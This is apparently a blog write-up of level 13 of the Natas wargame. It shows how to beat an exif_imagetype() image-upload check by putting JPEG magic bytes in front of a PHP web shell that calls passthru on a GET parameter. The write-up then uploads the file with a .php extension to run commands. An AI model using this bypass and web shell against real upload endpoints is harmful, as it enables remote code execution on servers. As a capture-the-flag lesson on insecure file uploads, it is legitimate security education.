In this post we’re going to be looking at Level 13 of the Natas wargame hosted by Over The Wire.<\/p>\n
Upon logging in, we see nearly the same setup as in level 12, except for the statement that uploading is restricted to image files only. \u00a0To determine how, let’s take a look at the source code. \u00a0Viewing the source code, we can see that it is nearly all identical, except for two lines. \u00a0There is now a new added check on the file being uploaded. \u00a0This check uses the exif_imagetype() function to determine if the file being uploaded is an image file or not. \u00a0If it isn’t, an error is printed to the screen and the file isn’t uploaded. \u00a0Of course, if it is determined to be an image file, the file is uploaded and a link to it is printed to the screen. \u00a0So, since this level checks the file’s type, what can we do with it?<\/p>\n
Lets RTFM for exif_imagetype()<\/a>. \u00a0Doing so we can see that it says it “reads the first bytes of an image and checks its signature.” \u00a0Ok, neat. \u00a0But what can we do with that? \u00a0Well, if we take the time (seconds) to Google something like “first bytes of jpg” and click on the 3rd link, we might just find a site<\/a>\u00a0that tells us that “a\u00a0\u00a0JPEG\u00a0<\/strong>image file is always found to hold the value\u00a0FF D8 FF E0\u00a0(Hex) in the first four bytes.” \u00a0Great. \u00a0So now we need to construct a file with those four specific hex bytes as the first four bytes of the file, and end it with our PHP snippet from last level.<\/p>\n So, to input the hex data, let’s jump to our Linux command line. \u00a0To input hex and php into a file, let’s use the following commands:<\/p>\n [somebox]$ echo ‘FFD8FFE0’ | xxd -r -p >> natas13attackfile.php We should now have our correctly crafted “image” file. \u00a0Now, we simply have to follow what we did in the last level to upload it. \u00a0Download the current level’s HTML, alter the action URL in the form declaration and change the filename field’s value to a .php extension. \u00a0Now, use your browser to log into the natas13 website, then use your local page to submit the upload file. \u00a0After upload, follow the link and perform the same command as last time, except this time let’s check out the natas14 file! \u00a0Upon execution, this tactic works, and the Level 14 password is revealed.<\/p>\n In an attempt to limit file type uploads to images, this level uses exif_imagetype(). \u00a0However, this function only looks for certain bytes of the file. \u00a0Additionally, PHP only evaluates certain parts of files, specifically that between <? and ?>. \u00a0Because of this, we were still able to get a file that has the first bytes of an image, and later has valid PHP within PHP tags. \u00a0Also, this level didn’t fix the problem of being able to upload a file with a PHP extension, causing it to run through the PHP interpreter. \u00a0These things together result in the vulnerability we were able to exploit and thus show, this isn’t the safe way to accept user files.<\/p>\n","protected":false},"excerpt":{"rendered":" In this post we’re going to be looking at Level 13 of the Natas wargame hosted by Over The Wire. What’s Going On? Upon logging in, we see nearly the same setup as in level 12, except for the statement … Continue reading
\n[somebox]$ echo “<? passthru(\\$_GET[‘h’]); ?>” >> natas13attackfile.php<\/p><\/blockquote>\nSo What?<\/h2>\n